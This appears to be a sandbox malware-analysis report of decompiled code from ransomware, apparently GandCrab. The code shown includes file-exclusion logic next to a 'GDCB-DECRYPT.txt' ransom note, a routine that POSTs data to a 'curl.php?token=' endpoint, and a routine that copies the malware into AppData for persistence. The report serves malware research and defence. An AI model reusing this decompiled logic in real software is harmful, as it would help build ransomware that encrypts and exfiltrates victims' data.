                                      0x00404227
                                      0x00404227
                                      0x0040422b
                                      0x0040422e
                                      0x00404231
                                      0x00404236
                                      0x00000000
                                      0x00404236
                                      0x004041c0
                                      0x0040423a
                                      0x0040423c
                                      0x00404244
                                      0x0040424c
                                      0x00404254
                                      0x0040425c
                                      0x00404264
                                      0x0040426c
                                      0x00404274
                                      0x0040427c
                                      0x00404284
                                      0x0040428c
                                      0x00404294
                                      0x0040429c
                                      0x004042a4
                                      0x004042ac
                                      0x004042b4
                                      0x004042bc
                                      0x004042c4
                                      0x004042c9
                                      0x004042cf
                                      0x004042de
                                      0x004042e4
                                      0x004042eb
                                      0x004042f9
                                      0x004042ff
                                      0x004042eb
                                      0x0040430d
                                      0x00404317
                                      0x00404321

                                      APIs
                                      • lstrcpyW.KERNEL32 ref: 004041C2
                                      • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004041C9
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 004042DE
                                      • wsprintfW.USER32 ref: 004042F9
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040430D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
                                      • String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$t$t${USERID}
                                      • API String ID: 4033391921-198931148
                                      • Opcode ID: 6847579bacb329ad28de8d3bfebd4ba97bf46600428eaa1bedf2c707f040ed1e
                                      • Instruction ID: b72f1aa0908df0bbc044f05aee074301ccc00ff49c2eba455c4c048f303cf63e
                                      • Opcode Fuzzy Hash: 6847579bacb329ad28de8d3bfebd4ba97bf46600428eaa1bedf2c707f040ed1e
                                      • Instruction Fuzzy Hash: C241D2B02043008BD7209F11995836BBAF1FFC5788F40892DFA85AB291D7B99955CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404D60(CHAR* __ecx, void* __edx) {
                                      				struct _SECURITY_ATTRIBUTES _v16;
                                      				short _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				short _v76;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t24;
                                      				void* _t37;
                                      				CHAR* _t43;
                                      				void* _t45;
                                      
                                      				_v76 = 0x73006e;
                                      				_v20 = 0;
                                      				_t37 = __edx;
                                      				_v16.lpSecurityDescriptor = 0;
                                      				_t43 = __ecx;
                                      				_v72 = 0x6f006c;
                                      				_v68 = 0x6b006f;
                                      				_v64 = 0x700075;
                                      				_v60 = 0x250020;
                                      				_v56 = 0x200053;
                                      				_v52 = 0x6e0064;
                                      				_v48 = 0x310073;
                                      				_v44 = 0x73002e;
                                      				_v40 = 0x70006f;
                                      				_v36 = 0x6f0072;
                                      				_v32 = 0x6e0064;
                                      				_v28 = 0x2e0073;
                                      				_v24 = 0x750072;
                                      				_v16.nLength = 0xc;
                                      				_v16.bInheritHandle = 1;
                                      				_t24 = CreatePipe(0x412b10, 0x412b0c,  &_v16, 0);
                                      				if(_t24 != 0) {
                                      					_t24 = SetHandleInformation( *0x412b10, 1, 0);
                                      					if(_t24 == 0) {
                                      						goto L1;
                                      					} else {
                                      						CreatePipe(0x412b08, 0x412b14,  &_v16, 0);
                                      						_t24 = SetHandleInformation( *0x412b14, 1, 0);
                                      						if(_t24 == 0) {
                                      							goto L1;
                                      						} else {
                                      							_t45 = VirtualAlloc(0, 0x2800, 0x3000, 4);
                                      							if(_t45 == 0) {
                                      								lstrcpyA(_t43, "fabian wosar <3");
                                      								return 0;
                                      							} else {
                                      								wsprintfW(_t45,  &_v76, _t37);
                                      								E00404B10(_t45);
                                      								E00404CB0(_t37, _t43, _t37, _t43, _t45);
                                      								VirtualFree(_t45, 0, 0x8000);
                                      								return 0;
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					L1:
                                      					return _t24 | 0xffffffff;
                                      				}
                                      			}


























                                      0x00404d6b
                                      0x00404d73
                                      0x00404d77
                                      0x00404d79
                                      0x00404d7c
                                      0x00404d81
                                      0x00404d93
                                      0x00404d9a
                                      0x00404da1
                                      0x00404da8
                                      0x00404daf
                                      0x00404db6
                                      0x00404dbd
                                      0x00404dc4
                                      0x00404dcb
                                      0x00404dd2
                                      0x00404dd9
                                      0x00404de0
                                      0x00404de7
                                      0x00404dee
                                      0x00404df5
                                      0x00404dfd
                                      0x00404e19
                                      0x00404e1d
                                      0x00000000
                                      0x00404e1f
                                      0x00404e2f
                                      0x00404e3f
                                      0x00404e43
                                      0x00000000
                                      0x00404e45
                                      0x00404e59
                                      0x00404e5d
                                      0x00404e9b
                                      0x00404ea9
                                      0x00404e5f
                                      0x00404e65
                                      0x00404e70
                                      0x00404e79
                                      0x00404e86
                                      0x00404e94
                                      0x00404e94
                                      0x00404e5d
                                      0x00404e43
                                      0x00404dff
                                      0x00404dff
                                      0x00404e08
                                      0x00404e08

                                      APIs
                                      • CreatePipe.KERNEL32(00412B10,00412B0C,?,00000000,00000000,00000001,00000000), ref: 00404DF5
                                      • SetHandleInformation.KERNEL32(00000001,00000000), ref: 00404E19
                                      • CreatePipe.KERNEL32(00412B08,00412B14,0000000C,00000000), ref: 00404E2F
                                      • SetHandleInformation.KERNEL32(00000001,00000000), ref: 00404E3F
                                      • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 00404E53
                                      • wsprintfW.USER32 ref: 00404E65
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404E86
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
                                      • String ID: $.$S$d$d$fabian wosar <3$l$n$o$o$r$r$s$s$u
                                      • API String ID: 1490407255-783179298
                                      • Opcode ID: 5b63822ef074579cd001efa140b9789c7fd5fb445f6afd0b1fdc3c768e3f9d6f
                                      • Instruction ID: 87b3df06f302a376c278e654a4a7d1f30e625f23b6bcd530246e45e208265c66
                                      • Opcode Fuzzy Hash: 5b63822ef074579cd001efa140b9789c7fd5fb445f6afd0b1fdc3c768e3f9d6f
                                      • Instruction Fuzzy Hash: FB31D8B1B01308ABEB109F95AD49BEE7FB5FB44714F104036E604F62D1D7F559448BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00406240(WCHAR* __ecx) {
                                      				int _t4;
                                      				signed int _t5;
                                      				signed int _t15;
                                      				void* _t19;
                                      				WCHAR* _t21;
                                      				short* _t25;
                                      				WCHAR* _t26;
                                      
                                      				_t21 = __ecx;
                                      				_t4 = lstrlenW(__ecx);
                                      				_t5 = lstrlenW(_t21);
                                      				_t1 = _t21 - 2; // -2
                                      				_t25 = _t1 + _t5 * 2;
                                      				_t19 = _t4 - 1;
                                      				if(_t19 != 0) {
                                      					do {
                                      						_t25 = _t25 - 2;
                                      						_t19 = _t19 - 1;
                                      					} while ( *_t25 != 0x5c && _t19 != 0);
                                      				}
                                      				_t26 = _t25 + 2;
                                      				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
                                      					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
                                      						goto L5;
                                      					} else {
                                      						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
                                      						asm("sbb eax, eax");
                                      						return  ~_t15 + 1;
                                      					}
                                      				} else {
                                      					L5:
                                      					return 1;
                                      				}
                                      			}










                                      0x00406249
                                      0x0040624c
                                      0x00406251
                                      0x00406253
                                      0x00406256
                                      0x00406259
                                      0x0040625a
                                      0x00406260
                                      0x00406260
                                      0x00406263
                                      0x00406264
                                      0x00406260
                                      0x00406274
                                      0x00406281
                                      0x00406296
                                      0x00000000
                                      0x004062e0
                                      0x004062e6
                                      0x004062eb
                                      0x004062f0
                                      0x004062f0
                                      0x00406285
                                      0x00406285
                                      0x0040628b
                                      0x0040628b

                                      APIs
                                      • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,00406403), ref: 0040624C
                                      • lstrlenW.KERNEL32(00000000), ref: 00406251
                                      • lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0040627D
                                      • lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 00406292
                                      • lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0040629E
                                      • lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 004062AA
                                      • lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 004062B6
                                      • lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 004062C2
                                      • lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 004062CE
                                      • lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 004062DA
                                      • lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 004062E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcmpi$lstrlen
                                      • String ID: GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
                                      • API String ID: 203586893-634406045
                                      • Opcode ID: 39cfe28d139bfd9c5cd1eab42733880a64dfed75e44f9506df37686ff5eafa02
                                      • Instruction ID: 048d6f8e0bde4782f578bbb55f50fa0ba415c8db6f5f272e4d17ab509b81b6c5
                                      • Opcode Fuzzy Hash: 39cfe28d139bfd9c5cd1eab42733880a64dfed75e44f9506df37686ff5eafa02
                                      • Instruction Fuzzy Hash: 3D11546264262A2ADA6072799C05EEB129C4D91F5031603BBFC05F21C4DFFDDEA285BD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 35%
                                      			E00405370(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
                                      				CHAR* _v12;
                                      				void* _v16;
                                      				CHAR** _v20;
                                      				void* _v24;
                                      				void* _v28;
                                      				void* _v32;
                                      				char _v36;
                                      				short _v136;
                                      				char _v1156;
                                      				short _v1160;
                                      				int _t45;
                                      				void* _t53;
                                      				CHAR* _t57;
                                      				CHAR* _t59;
                                      				CHAR* _t60;
                                      				void* _t61;
                                      				void* _t70;
                                      				short _t71;
                                      
                                      				_t59 = __ecx;
                                      				_v20 = __edx;
                                      				_v12 = __ecx;
                                      				E004077F0( &_v36);
                                      				_v24 = E00404EB0();
                                      				_t70 = 0x400 + lstrlenA(_t59) * 2;
                                      				_t7 = _t70 + 1; // 0x74cb6981
                                      				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
                                      				_v28 = _t60;
                                      				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
                                      				if(_t60 == 0) {
                                      					L2:
                                      					_t60 = 0;
                                      					L3:
                                      					lstrcatA(_t60, "data=");
                                      					lstrcatA(_t60, _v12);
                                      					asm("movdqu xmm0, [0x40ffd0]");
                                      					asm("movdqu [ebp-0x84], xmm0");
                                      					asm("movdqu xmm0, [0x40ffe0]");
                                      					asm("movdqu [ebp-0x74], xmm0");
                                      					asm("movdqu xmm0, [0x40fff0]");
                                      					asm("movdqu [ebp-0x64], xmm0");
                                      					asm("movdqu xmm0, [0x410000]");
                                      					asm("movdqu [ebp-0x54], xmm0");
                                      					asm("movdqu xmm0, [0x410010]");
                                      					asm("movdqu [ebp-0x44], xmm0");
                                      					asm("movdqu xmm0, [0x410020]");
                                      					asm("movdqu [ebp-0x34], xmm0");
                                      					lstrlenA(_t60);
                                      					_t71 = 0;
                                      					_v1160 = 0;
                                      					E00408B30( &_v1156, 0, 0x3fc);
                                      					lstrcpyW( &_v1160, L"curl.php?token=");
                                      					E00405270( &_v1160);
                                      					_t45 = lstrlenW( &_v136);
                                      					_t74 = _v16;
                                      					_push(_t45);
                                      					_push( &_v136);
                                      					_push(L"POST");
                                      					_push(0x31fff);
                                      					_push(_v16);
                                      					_push(lstrlenA(_t60));
                                      					_push(_t60);
                                      					_t61 = _v24;
                                      					_push( &_v1160);
                                      					_push(_t61);
                                      					if(E00407A00( &_v36) != 0) {
                                      						_t71 = 1;
                                      						if(_a4 != 0) {
                                      							_v12 = 0;
                                      							if(E00405050(_t74,  &_v12) == 0) {
                                      								_t71 = 0;
                                      							} else {
                                      								_t57 = _v12;
                                      								if(_t57 != 0) {
                                      									 *_v20 = _t57;
                                      								}
                                      							}
                                      						}
                                      					}
                                      					VirtualFree(_t61, 0, 0x8000);
                                      					VirtualFree(_v16, 0, 0x8000);
                                      					VirtualFree(_v28, 0, 0x8000);
                                      					_t53 = _v32;
                                      					if(_t53 != 0) {
                                      						InternetCloseHandle(_t53);
                                      					}
                                      					return _t71;
                                      				}
                                      				_t10 = _t70 + 1; // 0x74cb6981
                                      				if(_t70 < _t10) {
                                      					goto L3;
                                      				}
                                      				goto L2;
                                      			}





















                                      0x0040537b
                                      0x0040537d
                                      0x00405384
                                      0x00405387
                                      0x00405392
                                      0x004053a8
                                      0x004053af
                                      0x004053c3
                                      0x004053c7
                                      0x004053cc
                                      0x004053d1
                                      0x004053da
                                      0x004053da
                                      0x004053dc
                                      0x004053e8
                                      0x004053ee
                                      0x004053f0
                                      0x004053f9
                                      0x00405401
                                      0x00405409
                                      0x0040540e
                                      0x00405416
                                      0x0040541b
                                      0x00405423
                                      0x00405428
                                      0x00405430
                                      0x00405435
                                      0x0040543d
                                      0x00405442
                                      0x00405448
                                      0x00405457
                                      0x0040545d
                                      0x00405471
                                      0x0040547d
                                      0x00405489
                                      0x0040548f
                                      0x00405492
                                      0x00405499
                                      0x0040549a
                                      0x004054a2
                                      0x004054a7
                                      0x004054af
                                      0x004054b0
                                      0x004054b1
                                      0x004054ba
                                      0x004054bb
                                      0x004054c6
                                      0x004054cc
                                      0x004054d1
                                      0x004054d6
                                      0x004054e6
                                      0x004054f6
                                      0x004054e8
                                      0x004054e8
                                      0x004054ed
                                      0x004054f2
                                      0x004054f2
                                      0x004054ed
                                      0x004054e6
                                      0x004054d1
                                      0x00405506
                                      0x00405512
                                      0x0040551e
                                      0x00405520
                                      0x00405525
                                      0x00405528
                                      0x00405528
                                      0x00405536
                                      0x00405536
                                      0x004053d3
                                      0x004053d8
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                        • Part of subcall function 004077F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
                                        • Part of subcall function 004077F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED
                                        • Part of subcall function 00404EB0: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 00404F22
                                        • Part of subcall function 00404EB0: Sleep.KERNEL32(00002710), ref: 00404F4C
                                        • Part of subcall function 00404EB0: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00404F5A
                                        • Part of subcall function 00404EB0: VirtualAlloc.KERNEL32(00000000,00000000), ref: 00404F6A
                                        • Part of subcall function 00404EB0: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00404F7E
                                        • Part of subcall function 00404EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404F8F
                                        • Part of subcall function 00404EB0: wsprintfW.USER32 ref: 00404FA7
                                        • Part of subcall function 00404EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404FB8
                                      • lstrlenA.KERNEL32(00000000,74CB6980,00000000,00000000), ref: 00405395
                                      • VirtualAlloc.KERNEL32(00000000,74CB6981,00003000,00000040), ref: 004053B5
                                      • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 004053CA
                                      • lstrcatA.KERNEL32(00000000,data=), ref: 004053E8
                                      • lstrcatA.KERNEL32(00000000,004056FE), ref: 004053EE
                                      • lstrlenA.KERNEL32(00000000), ref: 00405442
                                      • _memset.LIBCMT ref: 0040545D
                                      • lstrcpyW.KERNEL32 ref: 00405471
                                      • lstrlenW.KERNEL32(?), ref: 00405489
                                      • lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 004054A9
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 00405506
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 00405512
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0040551E
                                      • InternetCloseHandle.WININET(?), ref: 00405528
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
                                      • String ID: POST$curl.php?token=$data=
                                      • API String ID: 186108914-1715678351
                                      • Opcode ID: 5eba2a68d1ef90ccaff39bd68a776efbf0a530b61a350863102a495147ee2029
                                      • Instruction ID: 4aa36092560c0acaf7b062926e9d70cdf9a0aa4eca25d73af60562301bb62425
                                      • Opcode Fuzzy Hash: 5eba2a68d1ef90ccaff39bd68a776efbf0a530b61a350863102a495147ee2029
                                      • Instruction Fuzzy Hash: 54519671E0031A66DB109BA5DD45FEEBB7CFB48300F104176FA44B6191DB786A44CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00402AD0() {
                                      				short _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				short _v20;
                                      				WCHAR* _v24;
                                      				WCHAR* _v28;
                                      				long _v32;
                                      				intOrPtr _v36;
                                      				WCHAR* _t24;
                                      				void* _t27;
                                      				WCHAR* _t33;
                                      				WCHAR* _t38;
                                      				signed int _t40;
                                      				signed int _t46;
                                      				WCHAR* _t50;
                                      				WCHAR* _t54;
                                      				void* _t56;
                                      				WCHAR* _t57;
                                      				void* _t58;
                                      				WCHAR* _t64;
                                      				WCHAR* _t65;
                                      				WCHAR* _t67;
                                      				signed int _t69;
                                      				void* _t71;
                                      				void* _t72;
                                      
                                      				_t71 = (_t69 & 0xfffffff8) - 0x1c;
                                      				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40);
                                      				_v24 = _t24;
                                      				_t64 = _t24;
                                      				_v32 = 0;
                                      				if(_t24 == 0) {
                                      					_t67 = 0;
                                      					_t50 = 0;
                                      					__eflags = 0;
                                      				} else {
                                      					_t3 =  &(_t24[0x101]); // 0x202
                                      					_t65 = _t3;
                                      					_v32 = 0x404;
                                      					_t50 = _t65;
                                      					_t67 = _t24;
                                      					_t64 =  &(_t65[0x101]);
                                      				}
                                      				_v28 = _t67;
                                      				GetModuleFileNameW(0, _t67, 0x100);
                                      				GetTempPathW(0x100, _t50);
                                      				_t6 =  &(_t50[1]); // 0x204
                                      				_t27 = E00407BA0(_t67, _t6);
                                      				_t75 = _t27;
                                      				if(_t27 == 0) {
                                      					_v20 = 0x520050;
                                      					_v8 = 0;
                                      					_push(0x52);
                                      					_v16 = 0x440049;
                                      					_v12 = 0x520055;
                                      					E00407C60( &_v20, lstrlenW( &_v20));
                                      					_t72 = _t71 + 4;
                                      					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
                                      					_t13 =  &(_t50[1]); // 0x2
                                      					_t54 = _t67;
                                      					_t33 = E00407BA0(_t54, _t13);
                                      					__eflags = _t33;
                                      					if(_t33 == 0) {
                                      						lstrcatW(_t50, L"\\Microsoft\\");
                                      						lstrcatW(_t50,  &_v20);
                                      						lstrcatW(_t50, L".exe");
                                      						_push(_t54);
                                      						_t38 = E00402890(_v28, _t50);
                                      						_t72 = _t72 + 4;
                                      						__eflags = _t38;
                                      						if(_t38 == 0) {
                                      							goto L17;
                                      						}
                                      						_t40 = lstrlenW(_t50);
                                      						__eflags = _v28;
                                      						_t56 = 0xa + _t40 * 2;
                                      						if(_v28 == 0) {
                                      							L13:
                                      							_t64 = 0;
                                      							__eflags = 0;
                                      							L14:
                                      							_push(_t50);
                                      							L15:
                                      							wsprintfW(_t64, L"\"%s\"");
                                      							_t57 = _t64;
                                      							goto L16;
                                      						}
                                      						__eflags = _v36 + _t56 - 0x800;
                                      						if(__eflags < 0) {
                                      							goto L14;
                                      						}
                                      						goto L13;
                                      					}
                                      					_t46 = lstrlenW(_t67);
                                      					__eflags = _v28;
                                      					_t58 = 0xa + _t46 * 2;
                                      					if(_v28 == 0) {
                                      						L8:
                                      						_t64 = 0;
                                      						__eflags = 0;
                                      						L9:
                                      						_push(_t67);
                                      						goto L15;
                                      					}
                                      					__eflags = _v36 + _t58 - 0x800;
                                      					if(__eflags < 0) {
                                      						goto L9;
                                      					}
                                      					goto L8;
                                      				} else {
                                      					_t57 = _t67;
                                      					L16:
                                      					E00402960(_t57, _t75);
                                      					L17:
                                      					ExitThread(0);
                                      				}
                                      			}




























                                      0x00402ad6
                                      0x00402aea
                                      0x00402af0
                                      0x00402af4
                                      0x00402af6
                                      0x00402b00
                                      0x00402b1c
                                      0x00402b1e
                                      0x00402b1e
                                      0x00402b02
                                      0x00402b02
                                      0x00402b02
                                      0x00402b08
                                      0x00402b10
                                      0x00402b12
                                      0x00402b14
                                      0x00402b14
                                      0x00402b28
                                      0x00402b2c
                                      0x00402b38
                                      0x00402b3e
                                      0x00402b43
                                      0x00402b48
                                      0x00402b4a
                                      0x00402b55
                                      0x00402b62
                                      0x00402b67
                                      0x00402b6c
                                      0x00402b75
                                      0x00402b89
                                      0x00402b8e
                                      0x00402b9c
                                      0x00402ba2
                                      0x00402ba5
                                      0x00402ba7
                                      0x00402bac
                                      0x00402bae
                                      0x00402be4
                                      0x00402bec
                                      0x00402bf4
                                      0x00402bf6
                                      0x00402bfd
                                      0x00402c02
                                      0x00402c05
                                      0x00402c07
                                      0x00000000
                                      0x00000000
                                      0x00402c0f
                                      0x00402c11
                                      0x00402c16
                                      0x00402c1d
                                      0x00402c2c
                                      0x00402c2c
                                      0x00402c2c
                                      0x00402c2e
                                      0x00402c2e
                                      0x00402c2f
                                      0x00402c35
                                      0x00402c3b
                                      0x00000000
                                      0x00402c3d
                                      0x00402c25
                                      0x00402c2a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402c2a
                                      0x00402bb6
                                      0x00402bb8
                                      0x00402bbd
                                      0x00402bc4
                                      0x00402bd3
                                      0x00402bd3
                                      0x00402bd3
                                      0x00402bd5
                                      0x00402bd5
                                      0x00000000
                                      0x00402bd5
                                      0x00402bcc
                                      0x00402bd1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402b4c
                                      0x00402b4c
                                      0x00402c40
                                      0x00402c40
                                      0x00402c45
                                      0x00402c47
                                      0x00402c47

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00402AEA
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00402B2C
                                      • GetTempPathW.KERNEL32(00000100,00000000), ref: 00402B38
                                      • lstrlenW.KERNEL32(?,?,?,00000052), ref: 00402B7D
                                        • Part of subcall function 00407C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
                                        • Part of subcall function 00407C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
                                        • Part of subcall function 00407C60: GetModuleHandleA.KERNEL32(?), ref: 00407CFF
                                        • Part of subcall function 00407C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
                                        • Part of subcall function 00407C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
                                        • Part of subcall function 00407C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
                                        • Part of subcall function 00407C60: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D73
                                      • GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 00402B9C
                                      • lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 00402BE4
                                      • lstrcatW.KERNEL32(00000000,?), ref: 00402BEC
                                      • lstrcatW.KERNEL32(00000000,.exe), ref: 00402BF4
                                      • wsprintfW.USER32 ref: 00402C35
                                      • ExitThread.KERNEL32 ref: 00402C47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
                                      • String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
                                      • API String ID: 139215849-2398311915
                                      • Opcode ID: 8f2a0bd0de482528f1caf89761174d1ff230737b866bf32f99a3677a47c9b2f2
                                      • Instruction ID: 1f7025583fece4150ab6efb2fb4095bab450847bdb3333ccf3c22af7b910d208
                                      • Opcode Fuzzy Hash: 8f2a0bd0de482528f1caf89761174d1ff230737b866bf32f99a3677a47c9b2f2
                                      • Instruction Fuzzy Hash: 0841A771204311ABE304EF219E4DB5F77A8AF84704F04443EB555B62D2DBB8A908CBAF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 89%
                                      			E00407369(signed int __eax, intOrPtr __edx, void* __esi) {
                                      				signed int _t51;
                                      				signed int _t56;
                                      				void* _t58;
                                      				long _t59;
                                      				void* _t75;
                                      				signed int _t77;
                                      				signed int _t80;
                                      				intOrPtr _t85;
                                      				WCHAR* _t88;
